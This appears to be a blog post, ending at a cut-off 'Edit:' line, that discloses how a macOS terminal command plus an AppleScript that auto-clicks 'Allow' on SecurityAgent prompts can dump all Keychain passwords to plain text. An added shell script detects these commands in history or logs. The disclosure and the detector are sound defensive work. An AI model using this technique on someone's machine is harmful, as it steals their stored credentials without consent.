This afternoon, a friend learned the hard way that you don’t let an unofficial company take control of your computer to provide “support”. However, it was what I learned that shocked me the most.

There is a method in OS X that will allow any user to export your keychain, without sudo privileges or any system dialogs, to a text file, with the usernames and passwords displayed in plain text. As of this writing, this method works in at least 10.10 and 10.11.5, and presumably in at least all iterations in between.

The method consists of opening up Terminal and copying and pasting the following command:

```
security dump-keychain -d login.keychain > keychain.txt
```

You can circumvent all system dialogs by scripting that terminal command and adding the following:

```
tell application "System Events"
    repeat while exists (processes where name is "SecurityAgent")
        tell process "SecurityAgent"
            click button "Allow" of group 1 of window 1
        end tell
        delay 0.2
    end repeat
end tell
```

Any unauthorized user, whether it's through a remote session like with my friend, or someone you've let borrow your computer for only a few seconds, can gain access to every username and password you've ever stored in Keychain, and inherently, iCloud.

Apple prides itself on security, but apparently this has been a known method for at least the two years since the article I used to confirm the method was posted. This is a major security flaw that at no step requires the user to confirm your password. The Keychain dialog requires your password when you request to "show password" for a particular entry.

Shouldn’t a terminal command require the same level of security?
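As an added example that is not part of the original post: a small POSIX shell check that scans shell history or a process-execution log (the sample lines below are constructed, not taken from a real machine) for the two things shown above, a `security dump-keychain -d` export and a scripted click on the SecurityAgent "Allow" button. The `flag_keychain_dump` function name and the log format are assumptions for this example.

```shell
#!/bin/sh
# Added example, not from the original post: flag log or history lines that
# match the keychain-export pattern described above.
#
# Constructed sample input. In practice the input would be ~/.bash_history,
# ~/.zsh_history, or the command-line field of a process-execution log.
SAMPLE_LINES=$(cat <<'EOF'
ls -la ~/Library/Keychains
security dump-keychain -d login.keychain > keychain.txt
osascript -e tell process "SecurityAgent" to click button "Allow" of group 1 of window 1
security find-generic-password -s example
git status
EOF
)

# Reads lines on stdin and prints each one that looks like a decrypted
# keychain export or a scripted click on the SecurityAgent authorization
# prompt, with the input line number and a SUSPICIOUS: prefix.
# Exit status is 0 when at least one line matched, 1 otherwise.
flag_keychain_dump() {
    grep -E -n \
        -e 'security[[:space:]]+dump-keychain[[:space:]].*-d' \
        -e 'SecurityAgent.*[Aa]llow' \
    | sed 's/^/SUSPICIOUS: /'
}

# Stand-alone run over the constructed sample: two of the five lines are flagged.
printf '%s\n' "$SAMPLE_LINES" | flag_keychain_dump
```

Running `security dump-keychain` without `-d` lists item metadata only and is not flagged; the decrypted form with `-d` is what triggers one SecurityAgent prompt per item, which is exactly what the AppleScript above auto-clicks. On the OS X versions mentioned, that UI-scripting part only works if the calling application has been granted Accessibility access under System Preferences > Security & Privacy > Privacy, so reviewing that list is another cheap check.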

Edit: Since this blew up overnight, I want to address a few comments and concerns that continue to come up: